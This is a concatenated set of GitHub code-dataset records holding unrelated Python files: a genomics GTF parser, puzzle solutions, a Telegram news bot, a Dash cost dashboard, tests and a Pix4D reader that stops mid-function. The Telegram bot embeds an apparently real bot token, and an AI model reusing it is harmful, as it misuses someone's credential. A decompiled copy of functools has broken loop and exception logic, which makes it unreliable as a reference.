chromosome:GRCh38:{gene[\"scaffold\"]}:{gene[\"start\"]}:{gene[\"end\"]} gene:{gene[\"name\"]} strand{gene[\"strand\"]}\\n'\n out.write(header)\n # out.write('\\n'.join([seq[i:i+80] for i in range(0, len(seq), 80)]))\n out.write(seq)\n out.write('\\n')\n\n for tr, data in gene['trs'].items():\n exons = data['exons']\n # TODO:\n # Decide how to handle single-exon isoforms\n\n # Nascent transcript\n # seq = sequence[gene['start']:gene['end']]\n # # if gene['strand'] == '-':\n # # seq = reverse_complement(seq)\n\n # if nascent:\n # header = f'>{tr}.N nascent_transcript chromosome:GRCh38:{gene[\"scaffold\"]}:{gene[\"start\"]}:{gene[\"end\"]} gene:{gene[\"name\"]} strand{gene[\"strand\"]}\\n'\n # out.write(header)\n # # out.write('\\n'.join([seq[i:i+80] for i in range(0, len(seq), 80)]))\n # out.write(seq)\n # out.write('\\n')\n\n # Mature transcript\n if mature:\n ivs = sorted([(e['start'], e['end']) for e in exons], key=lambda e: e[0])\n ivs = list(merge_intervals(ivs))\n header = f'>{tr} mature_transcript chromosome:GRCh38:{gene[\"scaffold\"]}:{ivs[0][0]}:{ivs[-1][1]} gene:{gene[\"name\"]} strand{gene[\"strand\"]}\\n'\n seq = collapse_data(ivs, sequence, '+')\n out.write(header)\n out.write('\\n'.join([seq[i:i+80] for i in range(0, len(seq), 80)]))\n out.write('\\n')\n\ndef parse_gtf(path, scaffolds, out, nascent, mature):\n # Who the heck came up with this hecking file format?\n genes = {}\n # Apparently, gtf files are not necessarily ordered by gene, so we cannot\n # do this in a single pass-through\n with gzip.open(path, 'r') as fh:\n for l in fh:\n\n line = l.decode('utf-8')\n # Skip comments\n if line.startswith('#'):\n continue\n\n data = line.split('\\t')\n fields = {\n 'scaffold': data[0],\n 'feature': data[2],\n 'start': int(data[3]) - 1, # Scaffold is 0-indexed\n 'end': int(data[4]) - 1,\n 'strand': data[6],\n 'rest': parse_rest(data[8])\n }\n gene_id = fields['rest']['gene_id']\n\n if gene_id not in genes:\n genes[gene_id] = {\n 'name': gene_id,\n 'trs': {},\n 'scaffold': fields['scaffold'],\n 'strand': fields['strand']\n }\n\n if fields['feature'] in ['exon',\n 'UTR',\n 'start_codon',\n 'stop_codon',\n 'five_prime_utr',\n 'three_prime_utr',\n 'CDS']:\n tr = fields['rest']['transcript_id']\n if tr not in genes[gene_id]['trs']:\n genes[gene_id]['trs'][tr] = {\n 'name': tr,\n 'exons': [fields]\n }\n else:\n genes[gene_id]['trs'][tr]['exons'].append(fields)\n elif fields['feature'] == 'gene':\n genes[gene_id]['start'] = fields['start']\n genes[gene_id]['end'] = fields['end']\n\n fh = open(out, 'w')\n for _, gene in genes.items():\n process_gene(gene, scaffolds, fh, nascent, mature)\n fh.close()\n\ndef generate_cDNA_introns(gtf_path, fasta_path, out='.', nascent=False, mature=False):\n scaffolds = parse_fasta(fasta_path)\n parse_gtf(gtf_path, scaffolds, out, nascent, mature)\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser()\n parser.add_argument('--nascent', action='store_true')\n parser.add_argument('--mature', action='store_true')\n parser.add_argument('--gtf', type=str, help='Path to GTF file')\n parser.add_argument('--fa', type=str, help='Path to fasta file')\n parser.add_argument('--out', type=str, help='Path to output file')\n args = parser.parse_args()\n\n generate_cDNA_introns(args.gtf, args.fa, args.out, args.nascent, args.mature)\n","repo_name":"pachterlab/HSHMP_2022","sub_path":"extract_introns/generate_cDNA+introns.py","file_name":"generate_cDNA+introns.py","file_ext":"py","file_size_in_byte":5856,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"61"} +{"seq_id":"45912738610","text":"import re\nfile_name = 'input.txt'\ninput = open(file_name, 'r').readline().rstrip('\\n').lstrip('target area: ')\nta_x_min,ta_x_max,ta_y_min,ta_y_max = [int(val) for val in re.findall(r\"-*\\d+\",input)] \n \ndef move(x_pos,y_pos,x_vel,y_vel):\n x_pos += x_vel\n y_pos += y_vel\n if x_vel > 0:\n x_vel -= 1\n elif x_vel < 0:\n x_vel += 1\n y_vel -= 1\n return x_pos,y_pos,x_vel,y_vel\n \ndef is_target_reached(x_pos,y_pos):\n return x_pos >= ta_x_min and x_pos <= ta_x_max and y_pos >= ta_y_min and y_pos <= ta_y_max\n\ndef is_targed_missed(x_pos,y_pos):\n return x_pos > ta_x_max or y_pos < ta_y_min\n \ndef main():\n max_y_reached = 0\n for x_start_vel in range(1,1000):\n for y_start_vel in range(1,1000):\n x_pos = 0\n y_pos = 0\n x_vel = x_start_vel\n y_vel = y_start_vel\n local_max_y = 0\n while not is_targed_missed(x_pos,y_pos):\n if y_pos > local_max_y:\n local_max_y = y_pos\n if is_target_reached(x_pos,y_pos):\n if local_max_y > max_y_reached:\n max_y_reached = local_max_y\n break\n x_pos,y_pos,x_vel,y_vel = move(x_pos,y_pos,x_vel,y_vel)\n return max_y_reached\n\n\nif __name__ == \"__main__\":\n print(main())\n","repo_name":"tomekrzymyszkiewicz/advent-of-code-2021","sub_path":"day17/task1.py","file_name":"task1.py","file_ext":"py","file_size_in_byte":1331,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"6757117497","text":"m1 = float(input(\"Digite a note M1:\"))\nm2 = float(input(\"Digite a note M2:\"))\nm3 = float(input(\"Didigte a note M3:\"))\n\nmedia = (m1 + m2 + m3) / 3\n\nmediaRound = round(media, 2)\n\nprint(\"\\nNota:\", mediaRound)\n\nif (mediaRound <= 4.0):\n print(\"Reprovado\")\n\nelse:\n if (mediaRound >= 4.1) & (mediaRound <= 6.0):\n print(\"Exame\")\n\n else:\n if (mediaRound > 6.0):\n print(\"Aprovado\")\n\n","repo_name":"wagnerbizarro/python_udemy","sub_path":"2-basico/11-exercicio.py","file_name":"11-exercicio.py","file_ext":"py","file_size_in_byte":407,"program_lang":"python","lang":"no","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"38668060199","text":"import logging\n\nimport telegram\n\nimport search\nfrom telegram import Update, ForceReply\nfrom telegram.ext import Updater, CommandHandler, MessageHandler, Filters, ConversationHandler, RegexHandler, CallbackContext\n\n# Enable logging\nlogging.basicConfig(\n format='%(asctime)s - %(name)s - %(levelname)s - %(message)s', level=logging.INFO\n)\n\nlogger = logging.getLogger(__name__)\n\nTOKEN = '5256719525:AAFR0Zouz-j5R-OWLAqES7M2ZVc3QHYYn0o'\n\n\n\ndef start(update: Update, context: CallbackContext) -> None:\n user = update.effective_user\n update.message.reply_markdown_v2(\n fr'Hi {user.mention_markdown_v2()}\\!',\n reply_markup=ForceReply(selective=True)\n )\n\n\n\ndef help_command(update: Update, context: CallbackContext) -> None:\n update.message.reply_text(text='Use /news command', parse_mode=telegram.ParseMode.HTML)\n\n\ndef news(update:Update, context: CallbackContext)-> None:\n text = search.getNews()\n title = search.getTitle()\n link = search.getLink()\n link_t = 'href=\"{0}\"'.format(link)\n update.message.reply_text(text='{0}'.format(title), parse_mode=telegram.ParseMode.HTML)\n update.message.reply_text(text)\n update.message.reply_text(link)\n\n\n\n#def echo(update: Update, context: CallbackContext):\n # update.message.reply_text(update.message.text)\n\n\ndef main() -> None:\n updater = Updater(TOKEN)\n dispatcher = updater.dispatcher\n\n # on different commands\n dispatcher.add_handler(CommandHandler(\"start\", start))\n dispatcher.add_handler(CommandHandler(\"help\", help_command))\n dispatcher.add_handler(CommandHandler(\"news\", news))\n\n #on non command\n # dispatcher.add_handler(MessageHandler(Filters.text & ~Filters.command, echo))\n\n #start\n updater.start_polling()\n\n updater.idle()\n\n\nif __name__ == '__main__':\n main()","repo_name":"teasec4/heroku-test-bot","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1806,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"17381180981","text":"\"\"\"\nGiven a sequence of words, check whether it forms a valid word square.\n\nA sequence of words forms a valid word square if the kth row and column read the exact same string, where 0 ≤ k < max(numRows, numColumns).\n\nNote:\nThe number of words given is at least 1 and does not exceed 500.\nWord length will be at least 1 and does not exceed 500.\nEach word contains only lowercase English alphabet a-z.\nExample 1:\n\nInput:\n[\n \"abcd\",\n \"bnrt\",\n \"crmy\",\n \"dtye\"\n]\n\nOutput:\ntrue\n\nExplanation:\nThe first row and first column both read \"abcd\".\nThe second row and second column both read \"bnrt\".\nThe third row and third column both read \"crmy\".\nThe fourth row and fourth column both read \"dtye\".\n\nTherefore, it is a valid word square.\nExample 2:\n\nInput:\n[\n \"abcd\",\n \"bnrt\",\n \"crm\",\n \"dt\"\n]\n\nOutput:\ntrue\n\nExplanation:\nThe first row and first column both read \"abcd\".\nThe second row and second column both read \"bnrt\".\nThe third row and third column both read \"crm\".\nThe fourth row and fourth column both read \"dt\".\n\nTherefore, it is a valid word square.\nExample 3:\n\nInput:\n[\n \"ball\",\n \"area\",\n \"read\",\n \"lady\"\n]\n\nOutput:\nfalse\n\nExplanation:\nThe third row reads \"read\" while the third column reads \"lead\".\n\nTherefore, it is NOT a valid word square.\n\"\"\"\n\n\n\"\"\"Solution\n 1. check the words by flip index i and j\n 2. check the len and index\n 3. remember to check every element\n\"\"\"\n\nclass Solution(object):\n def validWordSquare(self, words):\n \"\"\"\n :type words: List[str]\n :rtype: bool\n \"\"\"\n if not words:\n return True\n size = len(words)\n for i in range(size):\n # Error 2: the left boundary should be 0 otherwise the left bottom part would be checked\n for j in range(0, len(words[i])):\n # Error 1: the boundary should be i >= len(words[j])\n # j >= size check the horizontal and i >= len(words[j]) check the vertical\n if j >= size or i >= len(words[j]) or words[i][j] != words[j][i]:\n return False\n return True\n\n\n\n\n\n","repo_name":"bwang8482/LeetCode","sub_path":"Google/422_Valid_Word_Square.py","file_name":"422_Valid_Word_Square.py","file_ext":"py","file_size_in_byte":2077,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"5699210376","text":"# Baekjoon Online Judge - 1744번. 수 묶기\n\n\ndef calculate(arr):\n global max_result\n length = len(arr)\n # 홀수인 경우 마지막 값이 최소이고 이를 더해준다 \n if length % 2:\n for i in range(0, length - 1, 2):\n max_result += arr[i] * arr[i + 1]\n max_result += arr[-1]\n # 짝수인 경우 각각 곱해준 것을 더한다\n else:\n for i in range(0, length, 2):\n max_result += arr[i] * arr[i + 1]\n\n\nN = int(input())\nnegative = []\npositive = []\nmax_result = 0\nfor _ in range(N):\n num = int(input())\n # 규칙에 따라 1인 경우에는 더하는 것이 값을 올리므로 1을 기준으로 양수 음수 판단\n if num > 1:\n positive.append(num)\n elif num == 1:\n max_result += 1\n else:\n negative.append(num) # 0도 negative로 들어간다\n\n# 양수는 내림차순, 음수는 오름차순으로 정렬\nnegative.sort()\npositive.sort(reverse=True)\n\ncalculate(negative)\ncalculate(positive)\nprint(max_result)\n","repo_name":"wnstj-yang/Algorithm","sub_path":"BOJ/BOJ_1744.py","file_name":"BOJ_1744.py","file_ext":"py","file_size_in_byte":1020,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"20459022486","text":"__all__ = ['update_wrapper', 'wraps', 'WRAPPER_ASSIGNMENTS', 'WRAPPER_UPDATES', 'total_ordering', 'cmp_to_key', 'lru_cache', 'reduce', 'partial']\nfrom _functools import partial, reduce\nfrom collections import namedtuple\ntry:\n from _thread import RLock\nexcept:\n\n class RLock:\n __qualname__ = 'RLock'\n\n def __enter__(self):\n pass\n\n def __exit__(self, exctype, excinst, exctb):\n pass\n\nWRAPPER_ASSIGNMENTS = ('__module__', '__name__', '__qualname__', '__doc__', '__annotations__')\nWRAPPER_UPDATES = ('__dict__',)\n\ndef update_wrapper(wrapper, wrapped, assigned=WRAPPER_ASSIGNMENTS, updated=WRAPPER_UPDATES):\n wrapper.__wrapped__ = wrapped\n for attr in assigned:\n try:\n value = getattr(wrapped, attr)\n except AttributeError:\n pass\n setattr(wrapper, attr, value)\n for attr in updated:\n getattr(wrapper, attr).update(getattr(wrapped, attr, {}))\n return wrapper\n\ndef wraps(wrapped, assigned=WRAPPER_ASSIGNMENTS, updated=WRAPPER_UPDATES):\n return partial(update_wrapper, wrapped=wrapped, assigned=assigned, updated=updated)\n\ndef total_ordering(cls):\n convert = {'__lt__': [('__gt__', lambda self, other: not (self < other or self == other)), ('__le__', lambda self, other: self < other or self == other), ('__ge__', lambda self, other: not self < other)], '__le__': [('__ge__', lambda self, other: not self <= other or self == other), ('__lt__', lambda self, other: self <= other and not self == other), ('__gt__', lambda self, other: not self <= other)], '__gt__': [('__lt__', lambda self, other: not (self > other or self == other)), ('__ge__', lambda self, other: self > other or self == other), ('__le__', lambda self, other: not self > other)], '__ge__': [('__le__', lambda self, other: not self >= other or self == other), ('__gt__', lambda self, other: self >= other and not self == other), ('__lt__', lambda self, other: not self >= other)]}\n roots = [op for op in convert if getattr(cls, op, None) is not getattr(object, op, None)]\n if not roots:\n raise ValueError('must define at least one ordering operation: < > <= >=')\n root = max(roots)\n for (opname, opfunc) in convert[root]:\n while opname not in roots:\n opfunc.__name__ = opname\n opfunc.__doc__ = getattr(int, opname).__doc__\n setattr(cls, opname, opfunc)\n return cls\n\ndef cmp_to_key(mycmp):\n\n class K(object):\n __qualname__ = 'cmp_to_key..K'\n __slots__ = ['obj']\n\n def __init__(self, obj):\n self.obj = obj\n\n def __lt__(self, other):\n return mycmp(self.obj, other.obj) < 0\n\n def __gt__(self, other):\n return mycmp(self.obj, other.obj) > 0\n\n def __eq__(self, other):\n return mycmp(self.obj, other.obj) == 0\n\n def __le__(self, other):\n return mycmp(self.obj, other.obj) <= 0\n\n def __ge__(self, other):\n return mycmp(self.obj, other.obj) >= 0\n\n def __ne__(self, other):\n return mycmp(self.obj, other.obj) != 0\n\n __hash__ = None\n\n return K\n\ntry:\n from _functools import cmp_to_key\nexcept ImportError:\n pass\n_CacheInfo = namedtuple('CacheInfo', ['hits', 'misses', 'maxsize', 'currsize'])\n\nclass _HashedSeq(list):\n __qualname__ = '_HashedSeq'\n __slots__ = 'hashvalue'\n\n def __init__(self, tup, hash=hash):\n self[:] = tup\n self.hashvalue = hash(tup)\n\n def __hash__(self):\n return self.hashvalue\n\ndef _make_key(args, kwds, typed, kwd_mark=(object(),), fasttypes={int, str, frozenset, type(None)}, sorted=sorted, tuple=tuple, type=type, len=len):\n key = args\n if kwds:\n sorted_items = sorted(kwds.items())\n key += kwd_mark\n for item in sorted_items:\n key += item\n if typed:\n key += tuple(type(v) for v in args)\n if kwds:\n key += tuple(type(v) for (k, v) in sorted_items)\n elif len(key) == 1 and type(key[0]) in fasttypes:\n return key[0]\n return _HashedSeq(key)\n\ndef lru_cache(maxsize=128, typed=False):\n sentinel = object()\n make_key = _make_key\n (PREV, NEXT, KEY, RESULT) = (0, 1, 2, 3)\n\n def decorating_function(user_function):\n cache = {}\n hits = misses = 0\n full = False\n cache_get = cache.get\n lock = RLock()\n root = []\n root[:] = [root, root, None, None]\n if maxsize == 0:\n\n def wrapper(*args, **kwds):\n nonlocal misses\n result = user_function(*args, **kwds)\n misses += 1\n return result\n\n elif maxsize is None:\n\n def wrapper(*args, **kwds):\n nonlocal hits, misses\n key = make_key(args, kwds, typed)\n result = cache_get(key, sentinel)\n if result is not sentinel:\n hits += 1\n return result\n result = user_function(*args, **kwds)\n cache[key] = result\n misses += 1\n return result\n\n else:\n\n def wrapper(*args, **kwds):\n nonlocal hits, root, full, misses\n key = make_key(args, kwds, typed)\n with lock:\n link = cache_get(key)\n if link is not None:\n (link_prev, link_next, _key, result) = link\n link_prev[NEXT] = link_next\n link_next[PREV] = link_prev\n last = root[PREV]\n last[NEXT] = root[PREV] = link\n link[PREV] = last\n link[NEXT] = root\n hits += 1\n return result\n result = user_function(*args, **kwds)\n with lock:\n if key in cache:\n pass\n elif full:\n oldroot = root\n oldroot[KEY] = key\n oldroot[RESULT] = result\n root = oldroot[NEXT]\n oldkey = root[KEY]\n oldresult = root[RESULT]\n root[KEY] = root[RESULT] = None\n del cache[oldkey]\n cache[key] = oldroot\n else:\n last = root[PREV]\n link = [last, root, key, result]\n last[NEXT] = root[PREV] = cache[key] = link\n full = len(cache) >= maxsize\n misses += 1\n return result\n\n def cache_info():\n with lock:\n return _CacheInfo(hits, misses, maxsize, len(cache))\n\n def cache_clear():\n nonlocal hits, misses, full\n with lock:\n cache.clear()\n root[:] = [root, root, None, None]\n hits = misses = 0\n full = False\n\n wrapper.cache_info = cache_info\n wrapper.cache_clear = cache_clear\n return update_wrapper(wrapper, user_function)\n\n return decorating_function\n\n","repo_name":"johndpope/sims4-ai-engine","sub_path":"base/lib/functools.py","file_name":"functools.py","file_ext":"py","file_size_in_byte":7214,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"61"} +{"seq_id":"34674483567","text":"#!/usr/bin/python\r\n# -*- coding: utf-8 -*-\r\n\r\nimport dash\r\nimport dash_core_components as dcc\r\nimport dash_html_components as html\r\nfrom dash.dependencies import Output, Input\r\nimport dash_bootstrap_components as dbc\r\nimport pandas as pd\r\nimport plotly.express as px\r\nfrom datetime import date\r\nimport plotly.graph_objs as go\r\nfrom flask import Flask\r\n\r\n\r\nserver = Flask(__name__)\r\napp = dash.Dash(__name__, server=server)\r\ndf_Azure = pd.read_csv('data/Azure-cost-management-today.csv')\r\n\r\n\r\n\r\n\r\ndef make_lists(df, tag, title):\r\n radio_list = [html.H4(f'{title}', style={'textAlign':'center'})]\r\n dic = []\r\n \r\n for s ,c in df[f'{tag}'].value_counts().iteritems():\r\n dic.append({'label': f'{s} : {c}', 'value' : f'{s}'})\r\n #print(dic)\r\n radio_list.append( \r\n #html.Label(f'{s}', style={'display':'inline', 'fontSize':15}),\r\n dcc.Dropdown(\r\n id=f\"my-lists-{tag}\",\r\n options=dic,\r\n value=[],\r\n multi=True, \r\n style={'width': '600px', 'height' : '100%'}\r\n ) \r\n )\r\n return html.Div(radio_list, style={'textAlign':'left'})\r\n\r\n\r\n\r\n\r\ndef page_html(df, app):\r\n \r\n \r\n\r\n today = date.today()\r\n\r\n app.layout = html.Div([\r\n \r\n \r\n dbc.Row([\r\n dbc.Col(html.H1(f'Cost Managemnet {today}', style={'textAlign':'center'}), width=12)\r\n ]),\r\n \r\n dbc.Row([\r\n dbc.Col(html.Div(\r\n className='ikdrow',\r\n style = {'display' : 'flex'},\r\n children=[make_lists(df, 'tags', 'Tags'),\r\n make_lists(df, 'resource_group', 'Resource Group'),\r\n dcc.DatePickerRange(\r\n id='my-date-picker-range',\r\n min_date_allowed=date(2018, 12, 31),\r\n max_date_allowed=today,\r\n initial_visible_month=today,\r\n end_date=today, \r\n start_date = df[\"date\"].min(),\r\n style={'width': '100%', 'height' : '30%'}\r\n ),\r\n html.Div(id='output-container-date-picker-range',\r\n children=[html.P(f'Cost : {df[\"cost\"].sum()} euro')]\r\n )\r\n ]\r\n ), style = {'textAlign': 'center', 'border':'10px'}\r\n )\r\n ]),\r\n dbc.Row([\r\n dbc.Col(dcc.Graph(id='my-camonbrt', config={'displayModeBar':True} )),\r\n \r\n #dbc.Col(dcc.Graph(id='my-bar', figure=fig_AWS, config={'displayModeBar': False}))\r\n ]), #, style={'width': '100%', 'height' : '100%'} \r\n dbc.Row([\r\n dbc.Col(dcc.Graph(id='my-choropleth', config={'displayModeBar':False}))\r\n \r\n ], style={'width': '100%', 'height' : '100%'}) , \r\n ])\r\n\r\ndef gets_rg(df, lentgh, value):\r\n\r\n prerf = '(df[\"resource_group\"] == value[0])'\r\n for i in range(1, lentgh):\r\n prerf += f' & (df[\"resource_group\"] == value[{i}])'\r\n print(value[i])\r\n print(prerf)\r\n mask = eval(prerf)\r\n print(type(mask))\r\n return df.loc[mask]\r\n\r\n\r\n\r\n@app.callback(\r\n dash.dependencies.Output('my-camonbrt', 'figure'),\r\n [dash.dependencies.Input('my-date-picker-range', 'start_date'),\r\n dash.dependencies.Input('my-date-picker-range', 'end_date'),\r\n dash.dependencies.Input('my-lists-resource_group', 'value')])\r\ndef update_fig(start_date, end_date, value):\r\n \r\n bar_Azure = px.bar(df_Azure, x=\"date\", y=\"cost\", color=\"resource_group\")\r\n print(value)\r\n df_tmp = df_Azure\r\n if len(value) > 0:\r\n df_tmp = gets_rg(df_Azure, len(value), value)\r\n print(len(df_tmp))\r\n if start_date is not None and end_date is not None :\r\n \r\n mask = (df_tmp['date'] >= start_date) & (df_tmp['date'] <= end_date) \r\n df_now = df_tmp.loc[mask]\r\n #print(df_now.head())\r\n bar_Azure = px.bar(df_now, x=\"date\", y=\"cost\", color=\"resource_group\")\r\n\r\n\r\n return bar_Azure \r\n else :\r\n return bar_Azure\r\n\r\n\r\n@app.callback(\r\n dash.dependencies.Output('my-choropleth', 'figure'),\r\n [dash.dependencies.Input('my-date-picker-range', 'start_date'),\r\n dash.dependencies.Input('my-date-picker-range', 'end_date')])\r\ndef update_fig(start_date, end_date):\r\n \r\n pie_Azure = px.pie(df_Azure, values='cost', names='resource_group')\r\n if start_date is not None and end_date is not None :\r\n\r\n mask = (df_Azure['date'] >= start_date) & (df_Azure['date'] <= end_date)\r\n df_now = df_Azure.loc[mask]\r\n\r\n pie_Azure = px.pie(df_now, values='cost', names='resource_group', title='cost by resource group', hover_data=['resource_group'])\r\n #pie_Azure = px.pie(df_now, values='cost', names='resource_group')\r\n\r\n return pie_Azure \r\n else :\r\n return pie_Azure\r\n\r\n\r\n@app.callback(\r\n dash.dependencies.Output('output-container-date-picker-range', 'children'),\r\n [dash.dependencies.Input('my-date-picker-range', 'start_date'),\r\n dash.dependencies.Input('my-date-picker-range', 'end_date')])\r\ndef update_output(start_date, end_date):\r\n \r\n string_prefix = 'You have selected: '\r\n if start_date is not None and end_date is not None :\r\n\r\n mask = (df_Azure['date'] >= start_date) & (df_Azure['date'] <= end_date)\r\n df_now = df_Azure.loc[mask]\r\n sum_cost = df_now['cost'].sum()\r\n string_prefix = f'Cost : {sum_cost} euro'\r\n\r\n return string_prefix \r\n else :\r\n return f'Cost : {df_Azure[\"cost\"].sum()} euro'\r\n\r\ndef main():\r\n page_html(df_Azure, app)\r\n\r\nif __name__ == '__main__':\r\n main()\r\n app.run_server()\r\n \r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\"\"\"\r\ndf_AWS = pd.read_csv('data/AWS-cost-management.csv')\r\n\r\nfig_AWS = px.histogram(df_AWS, x=\"lineItem/UsageStartDate\", y=\"lineItem/UnblendedCost\", title=\"AWS : lineItem/UsageStartDate by lineItem/UnblendedCost\")\r\nfig_Azure.update_layout(\r\n title={\r\n 'text': \"Azure : Date by Cost\",\r\n 'y':0.9,\r\n 'x':0.5,\r\n 'xanchor': 'center',\r\n 'yanchor': 'top'})\r\n\r\n\"\"\"","repo_name":"HSabbar/Cost-Management","sub_path":"dashbord.py","file_name":"dashbord.py","file_ext":"py","file_size_in_byte":6528,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"34587653056","text":"import pytest\nfrom truck_delivery_atge.db_connector import DBConnector\nfrom truck_delivery_atge.client import Client\nfrom truck_delivery_atge.client_manager import ClientManager\nimport json\n\n\n@pytest.fixture\ndef db_connector(mocker) -> DBConnector:\n _, client = get_client_mock()\n db_conn = mocker.Mock(spec=DBConnector)\n db_conn.save.return_value = True\n db_conn.get_by_id.return_value = client\n db_conn.get_all.return_value = [client]\n db_conn.get_by_pattern.return_value = [client]\n db_conn.delete_by_id.return_value = True\n return db_conn\n\n\ndef get_client_mock():\n ci_test = '123456ci'\n name = 'testerson'\n client = Client(\n ci_test,\n name,\n email='test@mail.com',\n cellphone='+591',\n address='test',\n nit='8888',\n contract_number='12345678')\n return ci_test, client\n\n\ndef test_save_document(db_connector):\n ci_test, client = get_client_mock()\n client_manager = ClientManager(db_connector)\n result_save = client_manager.save_document(ci_test, client)\n assert result_save is True\n\n\ndef test_get_document(db_connector):\n ci_test, client = get_client_mock()\n client_manager = ClientManager(db_connector)\n client_manager.save_document(ci_test, client)\n client_saved = client_manager.get_document(ci_test)\n assert client.to_dict() == client_saved.to_dict()\n\n\ndef test_get_all(db_connector):\n ci_test, client = get_client_mock()\n client_manager = ClientManager(db_connector)\n client_manager.save_document(ci_test, client)\n all_saved = client_manager.get_all()\n assert all_saved[0].to_dict() == client.to_dict()\n\n\ndef test_delete(db_connector):\n ci_test, client = get_client_mock()\n client_manager = ClientManager(db_connector)\n client_manager.save_document(ci_test, client)\n result = client_manager.delete(ci_test)\n assert result == True\n","repo_name":"ATGE/dev-fundamentals-ii","sub_path":"tests/unit/test_client_manager.py","file_name":"test_client_manager.py","file_ext":"py","file_size_in_byte":1878,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"9144834131","text":"from cProfile import label\r\nimport pywhatkit\r\nfrom tkinter import *\r\nimport tkinter.messagebox\r\nimport requests \r\n# s = input('Enter a song : ')\r\n# pywhatkit.playonyt(s)\r\n\r\ntk = Tk()\r\ntk.title('Online songs')\r\ntk.geometry('500x300')\r\nlabel = Label(tk, text='Enter the song :',font=('bold',12))\r\nlabel.place(x=150,y=70)\r\nsongtext = StringVar()\r\nsongentry = Entry(tk, textvariable=songtext).place(x=150,y=100)\r\n\r\ndef searchsong():\r\n song = songtext.get()\r\n pywhatkit.playonyt(song)\r\n\r\nsearchbutton = Button(tk, text='Search',width=12, command=searchsong).place(x=150,y=150)\r\n\r\ntk.mainloop()","repo_name":"YenaCha/online-songs","sub_path":"song.py","file_name":"song.py","file_ext":"py","file_size_in_byte":594,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"37150173894","text":"#\n#\n# Pix4D.py : plot result BBA/AT resulted from Pix4D by reading from 'parameters folder'\n# user supplies necessary configuration data via Tom's Obvious Minimal \n# Language (TOML) BLOCK_CONFIG.toml\n# Author : P.Santitamnont (Phisan.Chula@gmail.com)\n# Version : 0.3 ( 2022-12-14 )\n#\n#\nimport shutil,re\nfrom pathlib import Path\nfrom shapely.geometry import box,LineString,Polygon\nimport numpy as np \nimport pandas as pd\nimport geopandas as gpd\nimport scipy.optimize \nimport tomli\n\n##########################################################################################\nclass Pix4dBlock:\n def __init__( self,PIX4D_PATH ):\n PIX4D_PATH = Path( PIX4D_PATH )\n with open( PIX4D_PATH.joinpath('BLOCK_INFO.toml'), mode='rb') as fp:\n self.CONFIG = tomli.load(fp)\n print( self.CONFIG ) \n self.CACHE = Path( './CACHE' )\n self.CACHE.mkdir(parents=True, exist_ok=True)\n self.BLOCK = self.CACHE.joinpath( './dfPix4dBlock.gpkg' )\n #import pdb; pdb.set_trace()\n PROJCS = list( PIX4D_PATH.glob('./1_initial/params/*_wkt.prj') )[0]\n with open (PROJCS, 'r') as f : self.PROJCS = f.read()\n #############################################\n PMATRIX = list(PIX4D_PATH.glob('./1_initial/params/*_pmatrix.txt'))[0]\n dfPMat = pd.read_csv( PMATRIX, delim_whitespace=True, header=None )\n def MakeMat( row ):\n return np.matrix( row[1:13] ).reshape( 3,4 )\n dfPMat['PMat' ]= dfPMat.apply( MakeMat, axis=1)\n #############################################\n dfJPG = pd.DataFrame( list(PIX4D_PATH.glob('./*/*/*.JPG')), columns=['JPG_Path'] )\n if len(dfJPG)==0: \n print( '***WARING*** no directory of JPG images ...')\n #############################################\n EXT_PAR = list(PIX4D_PATH.glob('./1_initial/params/*_calibrated_external_camera_parameters.txt'))[0]\n dfExt = pd.read_csv( EXT_PAR, delim_whitespace=True )\n dfImage = pd.merge( dfExt, dfPMat[[0,'PMat']] , how='inner', left_on='imageName', right_on=0 )\n #if len(dfJPG)>0:\n # dfImage = pd.merge( dfImage, dfJPG , how='inner', left_on='imageName', right_on='ImageName' )\n self.dfImage = gpd.GeoDataFrame( dfImage, crs='EPSG:32647', \n geometry=gpd.points_from_xy( dfImage.X, dfImage.Y, dfImage.Z ) )\n self.dfImage.drop( labels=[0], axis=1, inplace=True )\n self.dfImage.rename( columns={'imageName': 'ImageName' } ,inplace=True )\n #import pdb ; pdb.set_trace()\n def MakeRig( row, self ):\n ImageStem = row.ImageName.split('.')[0]\n RigName = re.sub('.*?([0-9]*)$',r'\\1',ImageStem)\n RigPos = ImageStem[0:-len(RigName)] \n if RigPos not in self.CONFIG['RIG_POSITION']:\n raise print(f'***ERROR*** unknown prefix \"{ImageStem}\" ...')\n return [ ImageStem, row.ImageName , RigName, RigPos ]\n self.dfImage[ [ 'ImageStem', 'ImageName', 'RigName', 'RigPos' ] ] = \\\n self.dfImage.apply( MakeRig, axis=1, result_type='expand' , args=(self,) ) \n self.dfImage.sort_values( by=['RigName','RigPos'], inplace=True )\n #############################################\n OFFSET = list( PIX4D_PATH.glob('./1_initial/params/*_offset.xyz') )[0]\n self.OFFSET = np.matrix( np.loadtxt( OFFSET ) ).T\n\n def CopyRigImage( self, RIG_NAME ):\n if type(RIG_NAME) is str: \n dfIMAGE = self.dfImage[self.dfImage.RigName==RIG_NAME]\n else: \n dfIMAGE = RIG_NAME\n for grp,row in dfIMAGE.groupby( 'RigName' ):\n CACHE_RIG = self.CACHE.joinpath(f'./{grp}')\n CACHE_RIG.mkdir(parents=True, exist_ok=True)\n for _,img in row.iterrows(): \n src = img.JPG_Path \n dst = CACHE_RIG.joinpath( img.ImageName )\n print( f'CopyRigImage: copying {src} to {dst}...' )\n shutil.copyfile( src, dst ) \n\n def World2Image( self, IMAGE_STEM, XYZ ):\n ''' calculate undistorted image coordinate from object coordinate'''\n df = self.dfImage[ self.dfImage.ImageStem==IMAGE_STEM ]\n if len(df)!=1:\n 